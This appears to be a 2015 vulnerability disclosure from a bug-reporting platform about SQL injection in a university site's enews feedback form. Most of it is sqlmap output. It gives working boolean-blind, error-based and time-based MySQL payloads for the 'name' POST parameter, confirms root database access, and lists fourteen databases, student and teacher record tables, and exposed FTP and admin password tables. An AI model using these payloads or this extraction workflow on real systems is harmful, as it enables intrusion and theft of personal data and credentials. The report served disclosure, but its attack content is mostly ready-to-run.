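2015-11-26: Details reported to the vendor; awaiting vendor handling
2015-12-01: The vendor actively ignored the vulnerability; details disclosed to the public
POST injection compromises multiple databases
Injection point: http://**.**.**.**/e/enews/index.php
Injection type: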
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
---
[17:20:24] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
---
Root privileges:
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
[23:12:08] [INFO] fetching current user
[23:12:08] [INFO] resumed: root@localhost
current user: 'root@localhost'
Databases of multiple colleges are affected:
sqlmap identified the following injection point(s) with a total of 1136 HTTP(s) requests:
---
Parameter: name (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' RLIKE (SELECT (CASE WHEN (1457=1457) THEN 1 ELSE 0x28 END)) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT 6081 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6081=6081,1))),0x7170717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: bid=2&events_id=31305&enews=AddFeedback&name=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))GIBd) AND '%'='&major_class=&phone=&mail=&address=&company=&remark=
---
web server operating system: Linux CentOS 5.10
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5.0
available databases [14]:
[*] ftp
[*] information_schema
[*] mysql
[*] test
[*] usr_zjuemba
[*] zheda
[*] zju_cma
[*] zju_emba
[*] zju_gep
[*] zju_gmc
[*] zju_jcie
[*] zju_niim
[*] zju_som
[*] zju_vote
FTP account passwords for all sites are exposed (database ftp, table users, 10 entries).
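Basic information for several thousand students and teachers is exposed (including name, student ID, class, major, home address, résumé, etc.):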
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| student_login_log  | 118955  |
| teacher_login_log  | 32051   |
| article            | 23158   |
| admin_log          | 19863   |
| article20110418    | 16533   |
| cma_news           | 13284   |
| admin_login_log    | 10417   |
| meeting            | 7291    |
| student            | 3495    |  (student information table)
| student20120306    | 2797    |
| student20110919    | 2470    |
| student20110909    | 2314    |
| student20110331    | 2089    |
| article_baoming    | 1538    |
| zt_xly2011_baoming | 1161    |
| zt_xly2013_baoming | 980     |
| zt_xly2010_baoming | 849     |
| zt_xly2014_baoming | 822     |
| zt_xly2012_baoming | 632     |
| student20121022    | 446     |
| zt_yx2011_baoming  | 396     |
| teacher            | 311     |  (teacher information table)
| article_cate       | 169     |
| base_info          | 88      |
| friends            | 57      |
| dept               | 49      |
| upload_files       | 43      |
| admin_user         | 38      |
| zt_cate            | 22      |
| zt_yx2011_jiabin   | 15      |
| base_cate          | 9       |
| room               | 9       |
| en_index_pic       | 7       |
| friend_cate        | 6       |
| zt_huodong         | 6       |
| gundong            | 5       |
| peiyang            | 4       |
| photo              | 4       |
| teacher_bak        | 4       |
| article_wcate      | 3       |
| faqs               | 3       |
| qa_cate            | 3       |
| class              | 2       |
| zhuanye            | 2       |
| zt_info            | 2       |
| sitemap            | 1       |
+--------------------+---------+
Back-end administrator account passwords are exposed (database zju_som, table admin_user, 38 entries).
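The admin back end can be logged into, but I'm afraid of being expelled, so I'm not going any further. That's it.
Filter the input.
Severity: No impact, ignored by vendor
Ignored at: 2015-12-01 22:26
None yet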